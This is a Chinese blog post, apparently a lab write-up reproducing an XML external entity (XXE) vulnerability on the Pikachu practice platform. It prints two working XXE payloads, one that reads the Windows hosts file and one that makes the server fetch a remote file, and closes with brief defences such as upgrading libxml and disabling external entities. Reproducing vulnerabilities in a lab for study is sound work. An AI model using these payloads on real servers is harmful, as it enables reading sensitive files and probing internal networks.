XXE漏洞复现

最新推荐文章于 2024-04-16 16:15:27 发布
最新推荐文章于 2024-04-16 16:15:27 发布
阅读量2.9k 收藏 11
点赞数
分类专栏: 漏洞复现 文章标签: xxe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/102699135
版权

引言~

XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。


实验环境~

PHP版本:5.4.45
中间件:apache
复现平台:皮卡丘漏洞练习平台
libXML编译版本:2.7.8 libxml环境要在2.8以下

复现步骤

1.输入框输入body text 被当做xml命令执行了,初步判定存有xxe漏洞
在这里插入图片描述

2.构造payload验证语句测试

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
 <!ENTITY xxx SYSTEM "C:/Windows/System32/drivers/etc/hosts">
]>
<a>&xxx;</a>

在这里插入图片描述
成功通过xml外部实体函数获取windows敏感文件


再来验证是否能读取远程服务器的robot文件
poc:

Payload:
<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
 <!ENTITY xxx SYSTEM "http://xxxcom/robots.txt">
]>
<a>&xxx;</a>

在这里插入图片描述

在这里插入图片描述

成功读取,证明存在xxe漏洞,xxe漏洞复现完毕


漏洞防御

• 1.尽量不适用xml传输数据
• 2.libxml库升级为到2.9.0及以上

如果当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。

春日野穹ㅤ
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic CVE-2019-2647~2650 XXE漏洞分析
cp15191163199的博客
05-06 615
Oracle发布了4月份的补丁,详情见链接( https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html#Appen...
xxe漏洞浅谈以及复现
weixin_51692662的博客
10-18 1944
xxe
网络安全之XXE漏洞复现及防御(上篇)(技术进阶)
最新发布
weixin_70911257的博客
04-16 1240
xxe漏洞复现
CVE-2018-1273漏洞复现
永远是少年
12-26 1331
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-1273漏洞复现。 一、CVE-2018-1273漏洞简介 二、CVE-2018-1273漏洞复现
复现CVE-2022-10270(向日葵远程代码执行漏洞
Karka_的博客
03-08 988
引言漏洞描述影响版本:原理:环境搭建手动复现脚本复现修复建议。
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
安全漏洞干货-linux漏洞修复命令
明哥哥知识分享
09-23 796
1、漏洞名称:RHSA-2019:2197: elfutils security,bug fix,和 enhancement update 修复命令:yum update elfutils-default-yama-scope -y &&yum update elfutils-libelf -y &&yum update elfutils-libs -y cve编号:CVE-2018-16062,CVE-2018-16402,CVE-2018-16403,CVE-2018-1
phpshe v1.7漏洞复现(Sql injection+XXE)
weixin_51681694的博客
04-30 614
PHPSHE v1.7 sql注入,XXE
xxe靶机漏洞复现
千寻的博客
05-25 1254
0x00 XML介绍 可扩展标记语言,标准通用标记语言的子集,简称XML。 是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。 它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。 是Internet环境中跨平台的、依赖于内容的技术,也是当今处理分布式结构信息的有效工具。 早在1998年
2020第五空间 web writeup
a3320315的博客
06-27 3329
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2241
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
区块链安全—详谈共识攻击(二)
Fly_鹏程万里
11-15 1591
上一篇文章中我们讲述了传统的Pow以及Pos相关的延伸共识算法。而在这篇文章中,我们讲述一下区块链的精髓PBFT以及其延伸算法。 在安全方面,我们给大家科普一下日蚀攻击已经贿赂攻击。并且一步一步带大家复现一下前些日子爆出的区块链整数溢出攻击。希望大家能够从文章中了解到区块链的共识算法,并对相应的攻击手段有所掌握。 为了便于初学者接受,文章选择从基础开始讲起。有需要讨论的同学下方留言即可。...
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6278
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
十一、pikachu之XXE
qq_55202378的博客
08-25 503
pikachu XXE
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值